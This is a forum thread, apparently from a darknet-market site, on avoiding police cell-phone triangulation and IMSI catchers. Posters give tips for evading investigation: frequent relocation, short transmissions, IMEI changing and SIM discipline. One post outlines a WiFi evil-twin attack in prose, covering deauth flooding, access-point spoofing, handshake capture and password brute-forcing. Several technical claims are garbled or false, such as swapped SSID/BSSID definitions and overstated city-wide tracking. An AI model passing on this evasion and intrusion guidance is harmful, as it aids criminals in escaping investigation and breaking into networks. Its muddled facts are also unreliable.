Cellular Phone Triangulation : OpSec | Torhoo darknet markets

Depending on your threat model and how determined LE is they could still try to position you, especially if you don't change location and cell towers frequently. However, if you use different cell towers for a short time period your position will be hard to locate.

Be aware, if you use a single cell tower regularly, LE can place a stingray in a strategic position and start to triangulate. Depending on how fast they act, they could potentially able to locate your position with a 100-400m accuracy in a few minutes (depending on how lucky they are).

Another technique that LE might use is a directional signal detector, that will give them an approximation of the bearing and depending on their guess on what signal effect you use they can they can approximate the geographical area segment where you most likely are located.

Conclusion, you must frequently relocate and be transmitting for a short time. Never transmit from a fixed location.

/u/DaVenom confirms my research as well, but there's a few more gotyas to be aware of. If by chance OP you, or anyone else reading this is familiar with 80211 WiFi'Evil Twin' attacks, it's very enlightening to compare IMSI Catcher aka Stingray aka 'Cell Site Simulator' attacks to Rogue AP aka Evil Twin attacks - but with one crucial difference .

So with an Evil Twin attack you sniff out 80211 packets flying around you with the aid of your handy Monitor mode capable WiFi device running on linux, and you pick out an Access Point aka Station aka (WiFirouter) that already has one or more devices connected to it. Once done the attack just requires two simple steps that can be done simultaneously for optimal results:
1. Flood the real AP with 'poison packets' aka 'deauth' instructions which is just like a DDOS attack minus that first D. The true router gets so overwhelmed trying to please everyone that its CPU/RAM just can't take anymore and it crashes. You continue the storm of deauth's to keep it offline
2. Meanwhile, either with a second WiFi dongle or even with the same one if it's fancy enough, you begin transmitting a perfect copy of the AP that you just , for the moment, stamped out of existence. The magic happens when you are able to spoof the AP's hexadecimal name, SSID, it's human language name, BSSID, and its MAC address(the only crime, i think, within the jurisdiction of the FCC to enforce haha)
Edit: This works just as well or maybe better in reverse, you deauth and spoof a client that the router will handshake with, and said handshake is salted via a function that incorporates precise time, brand, and other incidental details that your evil little script already knows since it is doing this in real time.
Once done you do not necessarily have to do any social engineering because the clients that a moment ago were connected to an AP with the same SSID, BSSID, and MAC will just stupidly believe that you Evil Twin is the very same device and attempt to re-establish a connection. Such-re-establishing in WPA2 requires a '4-way handshake' and somewhere within the exchanged packets of aforementioned handshake there HAS TO BE a hash of the network's password. From there you can either brute force the password out or use social engineering.

Cell Site Simulators = They actually do ALL of the above mentioned sneaky little tricks but there's an essential difference. Cell phones are programmed to automatically switch their connection to which ever cell tower has the STRONGEST signal (closest/strongest = same thing.) This is what makes it possible to be riding a high speed train while yapping on the phone with your buddy. Your phone is in a "which one of your cell towers is my strongest cell tower?' query loop, and if/when a new tower is detected with a stronger signal, not only will your phone connect to that tower without informing the probably clueless cell phone owner of such a switch, but also there's essentially nothing you can do about it!

But here's where the problems really begin: Your standard text messages and your voice calls will always do their first hop to the strong tower(which in this case would be a sketchy looking white van with a team of piggies in it, eating potato chips non stop and staring for hours and hours) In an effort to not subject customers to planned obsolescence,...or perhaps a different reason, there's a special function built into the 'radio' circuit of cell phones regarding how to handle digitally encrypted information that uses a newer standard than the one built into a specific phone. A simple 'do it anyway' command can be sent that will just cause a cell phone to downgrade its digital encryption protocol. And the protocol it downgrades to, can be brute forced SO QUICKLY with today's technology that high end 'Site Simulator' devices(available only to law enforcement of course) can literally brute force decrypt all regular voice call and regular SMS data in real time. So returning to the comparison of traffic over WIFI, it's similar to when you get that HTTP but no HTTPS 'are you sure you want to proceed' error, but much much easier to totally intercept, decrypt, and obviously the device otherwise forwards and receives all communication beyond the simulator so as to not tip off the victim of the attack. Last but not least, the so-called Cell Site Simulator devices can query any phone with one more simple command to pull the cellular plan subscriber data from it!

Thus, be it a service provided by the same company or a different for liability reasons, there are cloud based services made available to LE in large cities that aggregate EVERYTHING collected by every Cell Site Simulator active at anytime and extrapolate the precise location of every person that lives in that city at any given time, even if your GPS etc. is off.

I want to point out, that using a phone at a place where only one signal tower exists may raise a curiosity flag.
If someone sees you driving somewhat around a lonely field or forest it's more likely he remembers details of your appearance.
If you want to take this path I encourage you to keep an eye on how you get to the location, how you behave there and how you leave it.

Triangulation is just a physical positioning. It can be quite precise depending on the environment in which you operate, how many towers are there and so on. To link your activity is a bigger issue. Using cellular hotspot anonymously without the linkage of the activities requires the HW riced device that allows IMEI change, your strong sanitation and behavioral discipline when changing SIM cards and so on.

it is very complex and needs a clear understanding of the pros and cons.